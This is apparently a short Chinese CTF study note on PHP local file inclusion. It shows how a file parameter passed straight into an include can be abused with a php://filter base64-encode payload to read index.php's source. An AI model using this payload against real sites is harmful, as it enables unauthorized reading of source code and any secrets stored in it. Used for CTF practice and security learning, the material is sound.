学习链接:/wh4am1/p/6542398.html
发现地址后面的参数直接使用的文件包含。 ?file=show.php
为了查看index.php的源文件, 可以使用下面的命令:
rlfi.php ?language=php://filter/read=convert.base64-encode/resource=index.php
这样就得到了 index.php的base64加密后的值,解密即可。
如果觉得《【CTF】LFI漏洞总结(PHP本地文件包含漏洞)》对你有帮助,请点赞、收藏,并留下你的观点哦!